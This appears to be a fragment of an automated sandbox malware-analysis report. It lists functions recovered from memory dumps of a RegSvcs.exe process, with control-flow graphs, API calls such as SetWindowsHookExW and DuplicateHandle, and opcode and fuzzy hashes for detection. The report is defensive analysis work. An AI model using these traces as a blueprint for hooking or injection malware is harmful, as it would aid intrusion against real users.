                                              control_flow_graph 880 73c2c40-73c2e18 885 73c2e1e-73c2e20 880->885 886 73c2ff4-73c2fff 880->886 887 73c3006-73c3011 885->887 888 73c2e26-73c2e2a 885->888 886->887 894 73c3018-73c3023 887->894 888->887 890 73c2e30-73c2e68 call 73c00b4 888->890 890->894 903 73c2e6e-73c2e72 890->903 898 73c302a-73c3035 894->898 902 73c303c-73c3068 898->902 938 73c306f-73c309b 902->938 904 73c2e7e-73c2e82 903->904 905 73c2e74-73c2e78 903->905 907 73c2e8d-73c2e91 904->907 908 73c2e84-73c2e8b 904->908 905->898 905->904 909 73c2ea9-73c2ead 907->909 910 73c2e93-73c2e97 907->910 908->909 911 73c2eaf-73c2eb1 909->911 912 73c2eb4-73c2ebb 909->912 914 73c2e99-73c2ea0 910->914 915 73c2ea2 910->915 911->912 916 73c2ebd 912->916 917 73c2ec4-73c2ec8 912->917 914->909 915->909 916->917 918 73c2f79-73c2f7c 916->918 919 73c2f46-73c2f49 916->919 920 73c2f17-73c2f1a 916->920 921 73c2fe2-73c2fed 916->921 922 73c2ece-73c2ed2 917->922 923 73c2fa7-73c2faa 917->923 925 73c2f7e 918->925 926 73c2f83-73c2fa2 918->926 932 73c2f4b-73c2f4e 919->932 933 73c2f54-73c2f77 919->933 927 73c2f1c-73c2f1f 920->927 928 73c2f25-73c2f44 920->928 921->886 922->921 929 73c2ed8-73c2edb 922->929 930 73c2fac-73c2faf 923->930 931 73c2fba-73c2fdd 923->931 925->926 953 73c2f00-73c2f04 926->953 927->902 927->928 928->953 935 73c2edd 929->935 936 73c2ee2-73c2efe 929->936 930->931 937 73c2fb1-73c2fb4 930->937 931->953 932->933 932->938 933->953 935->936 936->953 937->931 942 73c30a2-73c30d6 937->942 938->942 962 73c2f07 call 73c3448 953->962 963 73c2f07 call 73c34e8 953->963 964 73c2f07 call 73c3437 953->964 956 73c2f0d-73c2f14 962->956 963->956 964->956
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: ed89817ef4d1ccdfa332284a09223fca473ffd1d663117bd1f00f66a1813970b
                                              • Instruction ID: ffd31b11e3a521ed8ac5cf0b01c7ad5b7272b71df086cfc1edc4615970000fbc
                                              • Opcode Fuzzy Hash: ed89817ef4d1ccdfa332284a09223fca473ffd1d663117bd1f00f66a1813970b
                                              • Instruction Fuzzy Hash: F081C5707143099FEB1A9F38945526E3AA6FFC6360F24422DE92A9B3D1CF358D41C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07353DE0 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 965 7353de0-7353e25 970 7353e27-7353e3f 965->970 971 7353e88-7353e8a 965->971 976 7353e41-7353e57 970->976 977 7353e80-7353e83 970->977 972 7353e9c 971->972 973 7353e8c-7353e9a 971->973 974 7353e9e-7353ea0 972->974 973->974 978 7353f03-7353f05 974->978 979 7353ea2-7353eba 974->979 988 7353e60-7353e7e 976->988 989 7353e59 976->989 982 73541fe-735420c 977->982 980 7353f17 978->980 981 7353f07-7353f15 978->981 990 7353ebc-7353ed2 979->990 991 7353efb-7353efe 979->991 983 7353f19-7353f1b 980->983 981->983 995 7354215-7354241 982->995 996 735420e 982->996 986 7353f1d-7353f35 983->986 987 7353f7e-7353f80 983->987 1004 7353f37-7353f4d 986->1004 1005 7353f76-7353f79 986->1005 993 7353f92 987->993 994 7353f82-7353f90 987->994 988->977 989->988 1006 7353ed4 990->1006 1007 7353edb-7353ef9 990->1007 991->982 997 7353f94-7353f96 993->997 994->997 1026 73542c7-73542da 995->1026 1027 7354247-7354265 995->1027 996->995 1002 7353ff9-7353ffb 997->1002 1003 7353f98-7353fb0 997->1003 1008 735400d 1002->1008 1009 7353ffd-735400b 1002->1009 1018 7353ff1-7353ff4 1003->1018 1019 7353fb2-7353fc8 1003->1019 1020 7353f56-7353f74 1004->1020 1021 7353f4f 1004->1021 1005->982 1006->1007 1007->991 1012 735400f-7354011 1008->1012 1009->1012 1016 7354074-7354076 1012->1016 1017 7354013-735402b 1012->1017 1023 7354088 1016->1023 1024 7354078-7354086 1016->1024 1034 735402d-7354043 1017->1034 1035 735406c-735406f 1017->1035 1018->982 1036 7353fd1-7353fef 1019->1036 1037 7353fca 1019->1037 1020->1005 1021->1020 1028 735408a-735408c 1023->1028 1024->1028 1038 73542e1-73542e5 1026->1038 1060 7354267-73542a2 1027->1060 1061 73542dc 1027->1061 1032 73540ef-73540f1 1028->1032 1033 735408e-73540a6 1028->1033 1039 7354103 1032->1039 1040 73540f3-7354101 1032->1040 1053 73540e7-73540ea 1033->1053 1054 73540a8-73540be 1033->1054 1055 7354045 1034->1055 1056 735404c-735406a 1034->1056 1035->982 1036->1018 1037->1036 1042 73542e7 1038->1042 1043 73542f0-73542f1 1038->1043 1045 7354105-7354107 1039->1045 1040->1045 1042->1043 1063 7354310-7354354 1043->1063 1050 7354109-7354121 1045->1050 1051 735416a-735416c 1045->1051 1069 7354123-7354139 1050->1069 1070 7354162-7354165 1050->1070 1058 735417e 1051->1058 1059 735416e-735417c 1051->1059 1053->982 1072 73540c7-73540e5 1054->1072 1073 73540c0 1054->1073 1055->1056 1056->1035 1064 7354180-7354182 1058->1064 1059->1064 1110 73542a5 call 7354430 1060->1110 1111 73542a5 call 7354420 1060->1111 1061->1038 1101 7354356-7354388 1063->1101 1102 73543ce-73543e1 1063->1102 1067 7354184-7354186 1064->1067 1068 73541a2-73541ba 1064->1068 1076 7354198 1067->1076 1077 7354188-7354196 1067->1077 1085 73541bc-73541d2 1068->1085 1086 73541fb 1068->1086 1083 7354142-7354160 1069->1083 1084 735413b 1069->1084 1070->982 1072->1053 1073->1072 1078 735419a-735419c 1076->1078 1077->1078 1078->1063 1078->1068 1083->1070 1084->1083 1094 73541d4 1085->1094 1095 73541db-73541f9 1085->1095 1086->982 1093 73542a7-73542c5 1093->1026 1093->1027 1094->1095 1095->1086 1110->1093 1111->1093
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-65463447
                                              • Opcode ID: ab9afbf4cdbb1c8e658a014f4f164987c7df9a6e57644ede3824215748c77b02
                                              • Instruction ID: 91d3cde5478258b4d1a5b2f73c4b53011ccf957e086708fa293c1c25e489639a
                                              • Opcode Fuzzy Hash: ab9afbf4cdbb1c8e658a014f4f164987c7df9a6e57644ede3824215748c77b02
                                              • Instruction Fuzzy Hash: 6CF17CB5B00306DBEB199B68D850A6EBBF6EF84344B108529DC1ADB744EF74DC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C92A8 Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1112 73c92a8-73c92c5 1115 73c92ea-73c930e 1112->1115 1116 73c92c7 1112->1116 1121 73c9315-73c9384 1115->1121 1225 73c92cd call 73c901f 1116->1225 1226 73c92cd call 73c9418 1116->1226 1227 73c92cd call 73c92a8 1116->1227 1117 73c92d3-73c92e5 1117->1121 1122 73c92e7-73c92e9 1117->1122 1131 73c93b5-73c93d9 1121->1131 1132 73c9386-73c93a6 call 73c0110 call 73c0120 1121->1132 1142 73c93e0-73c9404 1131->1142 1141 73c93a8-73c93ac 1132->1141 1132->1142 1143 73c93ae-73c93b4 1141->1143 1144 73c940b-73c942c 1141->1144 1142->1144 1147 73c9433-73c9439 1144->1147 1148 73c942e call 73c0160 1144->1148 1150 73c9448-73c946e 1147->1150 1151 73c943b-73c943f 1147->1151 1148->1147 1152 73c9476-73c94e2 1150->1152 1151->1152 1153 73c9441-73c9447 1151->1153 1162 73c94ee-73c94f5 1152->1162 1163 73c94e4-73c94ed 1152->1163 1164 73c94fb-73c950c 1162->1164 1165 73c9606-73c9616 1162->1165 1164->1165 1168 73c9512-73c951b 1164->1168 1166 73c961c-73c9630 1165->1166 1167 73c969b-73c9735 1165->1167 1172 73c965b-73c969a 1166->1172 1173 73c9632-73c9638 1166->1173 1199 73c9775-73c9788 1167->1199 1200 73c9737-73c974a 1167->1200 1168->1167 1169 73c9521-73c9536 1168->1169 1178 73c953c-73c9545 1169->1178 1179 73c9538-73c953a 1169->1179 1175 73c963a-73c963f 1173->1175 1176 73c9647-73c964d 1173->1176 1175->1176 1176->1167 1180 73c964f-73c965a 1176->1180 1183 73c9554-73c955d 1178->1183 1184 73c9547-73c954c 1178->1184 1182 73c9567-73c9569 1179->1182 1186 73c956f-73c9573 1182->1186 1187 73c95f5 1182->1187 1183->1167 1185 73c9563 1183->1185 1184->1183 1185->1182 1189 73c9584-73c95f3 1186->1189 1190 73c9575-73c957d 1186->1190 1192 73c95f7-73c9600 1187->1192 1189->1192 1190->1189 1192->1165 1192->1168 1202 73c978a-73c97b8 1199->1202 1207 73c974c-73c9762 1200->1207 1208 73c9764-73c9767 1200->1208 1209 73c9768-73c976a 1202->1209 1210 73c97ba-73c97ca 1202->1210 1207->1202 1212 73c9771-73c9773 1208->1212 1209->1212 1214 73c97cc-73c97d4 1210->1214 1215 73c97db-73c97e5 1210->1215 1212->1199 1212->1200 1214->1215 1225->1117 1226->1117 1227->1117
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ./\
                                              • API String ID: 0-3176372042
                                              • Opcode ID: 5bf9ca7c779135ee7e754d16f30b2263a1d5fb7ff9bfc98fbd506e8c6ba50ec3
                                              • Instruction ID: 019092aeeb38975d1161b6a5f69b6c23713c5ae784835b0fc780250f19e058da
                                              • Opcode Fuzzy Hash: 5bf9ca7c779135ee7e754d16f30b2263a1d5fb7ff9bfc98fbd506e8c6ba50ec3
                                              • Instruction Fuzzy Hash: 36E1D070B053469FDB09EF74C49065EBBB6EF85300F1585AEC4099B282DB35EC46CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B0040 Relevance: 1.6, Instructions: 1574COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc2793b5613bdc2a7ad1d06ce75e8355f0d2bc3c6e887e986dcfe268c68b246e
                                              • Instruction ID: 05db2008063ba72377c880d9ffd2448a8cd153eee24b79c6a0ba99223e4edcfd
                                              • Opcode Fuzzy Hash: cc2793b5613bdc2a7ad1d06ce75e8355f0d2bc3c6e887e986dcfe268c68b246e
                                              • Instruction Fuzzy Hash: 5ED25B74721305CFDB6AEB34E0A866D37B3BF8A344B50486CD8069B394EF359D429B52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014079D4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1786 14079d4-1407f5c DuplicateHandle 1788 1407f65-1407f82 1786->1788 1789 1407f5e-1407f64 1786->1789 1789->1788
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01407E8E,?,?,?,?,?), ref: 01407F4F
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: bf441916b26dbd43d9496127128beac4146c3ec2c6b51a197346192545ea5117
                                              • Instruction ID: e6a7433dbd0ac9c03f4fdeca9794feab114c4f808d908026e27e76902d750ade
                                              • Opcode Fuzzy Hash: bf441916b26dbd43d9496127128beac4146c3ec2c6b51a197346192545ea5117
                                              • Instruction Fuzzy Hash: 9D21E5B59003499FDB10CFAAD984ADEBFF4EB48320F14841AE958A3350D375A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01407EC0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1792 1407ec0-1407f5c DuplicateHandle 1793 1407f65-1407f82 1792->1793 1794 1407f5e-1407f64 1792->1794 1794->1793
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01407E8E,?,?,?,?,?), ref: 01407F4F
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 07cf63a565837435776f8ed9728d6d6da5fd2c8758b8b01c44cc9dbc9de0241c
                                              • Instruction ID: c30c99242f6ed9c55bb619bd0c9ef16bbb5146fd8091d49240a8565920ca9ee3
                                              • Opcode Fuzzy Hash: 07cf63a565837435776f8ed9728d6d6da5fd2c8758b8b01c44cc9dbc9de0241c
                                              • Instruction Fuzzy Hash: D421E4B5900249DFDB10CFAAD985AEEBFF4FB48310F14841AE958A3350D375A954CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014029C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1797 14029c0-14029c1 1798 14029c3-1402a12 1797->1798 1799 1402a26-1402a50 SetWindowsHookExW 1797->1799 1806 1402a14 1798->1806 1807 1402a1e-1402a24 1798->1807 1801 1402a52-1402a58 1799->1801 1802 1402a59-1402a7e 1799->1802 1801->1802 1809 1402a1c 1806->1809 1807->1799 1809->1807
                                              APIs
                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01402A43
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 32660f34ee82f477fd17dcddfcd9bacc6224c221c68ab5cb3c6b0e06dec9df38
                                              • Instruction ID: ad968ac52e8b586741d431987cf2a61273913c36d074e6d24f4338b3c33e8bad
                                              • Opcode Fuzzy Hash: 32660f34ee82f477fd17dcddfcd9bacc6224c221c68ab5cb3c6b0e06dec9df38
                                              • Instruction Fuzzy Hash: 67213771D002499FDB14DF9AD848BDFBBF5EF88320F14842AD514A7290CBB5A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 014029C8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1810 14029c8-1402a12 1812 1402a14 1810->1812 1813 1402a1e-1402a50 SetWindowsHookExW 1810->1813 1815 1402a1c 1812->1815 1816 1402a52-1402a58 1813->1816 1817 1402a59-1402a7e 1813->1817 1815->1813 1816->1817
                                              APIs
                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01402A43
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: HookWindows
                                              • String ID:
                                              • API String ID: 2559412058-0
                                              • Opcode ID: 4bd92dbd576cb89586902676f941eaf0e38bbc11d60b92310902ec5fd4893ab5
                                              • Instruction ID: fc3fb94965dfb07f1c1f08a917ca20b58b80a4ecab2f7d75bd14a06957548c3e
                                              • Opcode Fuzzy Hash: 4bd92dbd576cb89586902676f941eaf0e38bbc11d60b92310902ec5fd4893ab5
                                              • Instruction Fuzzy Hash: BF211575D00249CFDB14DF9AD848BDFBBF5AF88320F10842AD519A7290CBB5A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0140D368 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1821 140d368-140d36a 1822 140d371-140d372 1821->1822 1823 140d36c-140d370 1821->1823 1824 140d374-140d377 1822->1824 1825 140d379-140d3c4 1822->1825 1823->1822 1824->1825 1827 140d412-140d42b 1825->1827 1828 140d3c6-140d3ee KiUserCallbackDispatcher 1825->1828 1829 140d3f0-140d3f6 1828->1829 1830 140d3f7-140d40b 1828->1830 1829->1830 1830->1827
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0140D3DD
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: 52b5e4651b2e273860393380069b2bbb5329ed4887398e728742a7d21209dd53
                                              • Instruction ID: 10c129f9c36f9894261c15de570e8b31bf1b51dd952d8573c16a15ca3c866296
                                              • Opcode Fuzzy Hash: 52b5e4651b2e273860393380069b2bbb5329ed4887398e728742a7d21209dd53
                                              • Instruction Fuzzy Hash: 4E21DEB5808799CECB22CF9AC5463EEBFF0AB05224F00809AD088A7382C7795508CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0140D378 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1832 140d378-140d3c4 1835 140d412-140d42b 1832->1835 1836 140d3c6-140d3ee KiUserCallbackDispatcher 1832->1836 1837 140d3f0-140d3f6 1836->1837 1838 140d3f7-140d40b 1836->1838 1837->1838 1838->1835
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0140D3DD
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4534657941.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_1400000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: 08eefdb317b142453b5de86376936fda63a7ea1777d8ec97cf27120b7ea3f956
                                              • Instruction ID: 77291aa1253af5db068a76b043109e051e1410e5445971fc40a339287fa842d1
                                              • Opcode Fuzzy Hash: 08eefdb317b142453b5de86376936fda63a7ea1777d8ec97cf27120b7ea3f956
                                              • Instruction Fuzzy Hash: 821190B5804799CEDB21CF9AC5453DEBFF4EB05314F10805AD599A7382C7B95608CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BF008 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1840 72bf008-72bf060 call 72bedb0 1846 72bf062-72bf064 1840->1846 1847 72bf066-72bf06a 1840->1847 1848 72bf070-72bf093 1846->1848 1847->1848 1853 72bf09f-72bf0ab 1848->1853 1854 72bf095-72bf09a 1848->1854 1859 72bf0de-72bf0ea 1853->1859 1860 72bf0ad-72bf0d9 call 72be6b0 1853->1860 1855 72bf17b-72bf181 1854->1855 1857 72bf183 1855->1857 1858 72bf187-72bf1a7 1855->1858 1857->1858 1872 72bf1a9-72bf1ae 1858->1872 1873 72bf1b3-72bf1c8 1858->1873 1864 72bf0ec-72bf0f1 1859->1864 1865 72bf0f6-72bf10a 1859->1865 1860->1855 1864->1855 1877 72bf10c-72bf12e 1865->1877 1878 72bf176 1865->1878 1875 72bf250-72bf25e 1872->1875 1885 72bf24b 1873->1885 1886 72bf1ce-72bf1de 1873->1886 1881 72bf260-72bf264 1875->1881 1882 72bf276-72bf282 1875->1882 1898 72bf130-72bf152 1877->1898 1899 72bf154-72bf16d 1877->1899 1878->1855 2011 72bf266 call 72bf920 1881->2011 2012 72bf266 call 72bf860 1881->2012 2013 72bf266 call 72bf850 1881->2013 1890 72bf288-72bf2a4 1882->1890 1891 72bf366-72bf39a 1882->1891 1885->1875 1893 72bf1f2-72bf1f7 1886->1893 1894 72bf1e0-72bf1f0 1886->1894 1887 72bf26c-72bf26e 1887->1882 1906 72bf352-72bf360 1890->1906 1914 72bf39c-72bf3b0 1891->1914 1915 72bf3b2-72bf3b4 1891->1915 1893->1875 1894->1893 1905 72bf1f9-72bf209 1894->1905 1898->1878 1898->1899 1899->1878 1916 72bf16f-72bf174 1899->1916 1912 72bf20b-72bf210 1905->1912 1913 72bf212-72bf222 1905->1913 1906->1891 1911 72bf2a9-72bf2b2 1906->1911 1917 72bf2b8-72bf2cb 1911->1917 1918 72bf571-72bf598 1911->1918 1912->1875 1928 72bf22b-72bf23b 1913->1928 1929 72bf224-72bf229 1913->1929 1914->1915 1920 72bf3b6-72bf3c8 1915->1920 1921 72bf3e4-72bf424 1915->1921 1916->1855 1917->1918 1922 72bf2d1-72bf2e3 1917->1922 1930 72bf59e-72bf5a0 1918->1930 1931 72bf62c-72bf67d 1918->1931 1920->1921 1937 72bf3ca-72bf3dc 1920->1937 2007 72bf426 call 72bfc59 1921->2007 2008 72bf426 call 72bfc68 1921->2008 1933 72bf34f 1922->1933 1934 72bf2e5-72bf2f1 1922->1934 1944 72bf23d-72bf242 1928->1944 1945 72bf244-72bf249 1928->1945 1929->1875 1930->1931 1936 72bf5a6-72bf5a8 1930->1936 1970 72bf67f-72bf68c 1931->1970 1971 72bf68d-72bf697 1931->1971 1933->1906 1934->1918 1938 72bf2f7-72bf34c 1934->1938 1936->1931 1941 72bf5ae-72bf5b2 1936->1941 1937->1921 1938->1933 1941->1931 1946 72bf5b4-72bf5b8 1941->1946 1944->1875 1945->1875 1950 72bf5ca-72bf60c call 72b9f38 1946->1950 1951 72bf5ba-72bf5c8 1946->1951 1949 72bf42c-72bf440 1964 72bf442-72bf459 1949->1964 1965 72bf487-72bf49e 1949->1965 1958 72bf614-72bf629 1950->1958 1951->1958 1978 72bf45b-72bf465 1964->1978 1979 72bf467-72bf47f call 72be6b0 1964->1979 2009 72bf4a0 call 7350833 1965->2009 2010 72bf4a0 call 7350838 1965->2010 1980 72bf699-72bf6a4 1971->1980 1981 72bf6a6-72bf6ac 1971->1981 1975 72bf4a6-72bf4d4 1990 72bf528-72bf53f 1975->1990 1991 72bf4d6-72bf4ef 1975->1991 1978->1979 1979->1965 1988 72bf6ae-72bf6f4 1980->1988 1981->1988 1996 72bf541-72bf54a 1990->1996 1997 72bf565-72bf56e 1990->1997 1999 72bf4f9-72bf525 1991->1999 2000 72bf4f1 1991->2000 2014 72bf54d call 7354fb8 1996->2014 2015 72bf54d call 7354fa8 1996->2015 1999->1990 2000->1999 2001 72bf553-72bf55c 2001->1997 2007->1949 2008->1949 2009->1975 2010->1975 2011->1887 2012->1887 2013->1887 2014->2001 2015->2001
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;k
                                              • API String ID: 0-4239655375
                                              • Opcode ID: 63384f0d3cb35008d593e756505ac76bdc52e8328def6e1cf321deef01468ef6
                                              • Instruction ID: 1541a76e3af190673dd179902c2ad97ff05f6f869be80bef36e39acae23073cc
                                              • Opcode Fuzzy Hash: 63384f0d3cb35008d593e756505ac76bdc52e8328def6e1cf321deef01468ef6
                                              • Instruction Fuzzy Hash: 37B14774710646CFCB14DF39C998A9ABBF2BF89341B1540A9E546DB362DB30ED05CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B9198 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2016 72b9198-72b91ab 2018 72b91ad-72b91af 2016->2018 2019 72b91b7-72b91b9 2016->2019 2018->2019 2020 72b91c2-72b91dc 2019->2020 2022 72b932f-72b9341 2020->2022 2023 72b91e2-72b91e7 2020->2023 2034 72b9373-72b937f 2022->2034 2035 72b9343-72b936b 2022->2035 2024 72b91e9 2023->2024 2025 72b9241-72b9246 2023->2025 2028 72b91ec-72b91ef 2024->2028 2026 72b9248-72b9251 2025->2026 2027 72b9266-72b926f 2025->2027 2026->2022 2030 72b9257-72b9264 2026->2030 2031 72b9288-72b928e 2027->2031 2032 72b9271-72b9285 2027->2032 2028->2022 2033 72b91f5-72b9201 2028->2033 2036 72b9291-72b929a 2030->2036 2031->2036 2032->2031 2037 72b9203-72b9218 2033->2037 2038 72b9224-72b922d 2033->2038 2035->2034 2036->2022 2041 72b92a0-72b92c8 2036->2041 2037->2038 2046 72b921a-72b9223 2037->2046 2038->2022 2043 72b9233-72b923f 2038->2043 2041->2022 2045 72b92ca-72b92e8 2041->2045 2043->2025 2043->2028 2047 72b92ea-72b92f4 2045->2047 2048 72b9322-72b932e 2045->2048 2047->2048 2052 72b92f6-72b931a 2047->2052 2052->2048
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 13f765ac32ee8977ae22e7db63362037e857e010f653d2381a1f2872e7a995cf
                                              • Instruction ID: 9d50675f30624cba2a7ae06147c0b8f366862029176a2906e4f1afd266511ba8
                                              • Opcode Fuzzy Hash: 13f765ac32ee8977ae22e7db63362037e857e010f653d2381a1f2872e7a995cf
                                              • Instruction Fuzzy Hash: FA61ABB4A1060ADFCB24DF59D4C08AAF7B6FF88300B51C629CA9997655DB30FC91CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B4FA8 Relevance: 1.4, Instructions: 1389COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf3e24ec07cba9d0cbcff5848f5f81ac2723d7e61ffe9c34918dcb7e42a9469e
                                              • Instruction ID: 1b95641b8ccb4cf7a711fc332acf5df29c7954ea2f450e0c5c0cee7c463046eb
                                              • Opcode Fuzzy Hash: bf3e24ec07cba9d0cbcff5848f5f81ac2723d7e61ffe9c34918dcb7e42a9469e
                                              • Instruction Fuzzy Hash: 9DE21A74A01319EFEB55ABA0E854BAEBB32FF88300F104098DA192B799CF755D91CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07353DBF Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-65463447
                                              • Opcode ID: 19f7f60411d5d8231a5415e44faf4e2a06f9bc672db66908049343b120213d97
                                              • Instruction ID: cad49cf0b99160aaea399819995107afc9332b3c0130a7a86f0136b776fca1f6
                                              • Opcode Fuzzy Hash: 19f7f60411d5d8231a5415e44faf4e2a06f9bc672db66908049343b120213d97
                                              • Instruction Fuzzy Hash: 505182B4A003159FDB19DF69D894A9EBBF6FF84354F00842DE919AB350DF70AD458B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07352B92 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
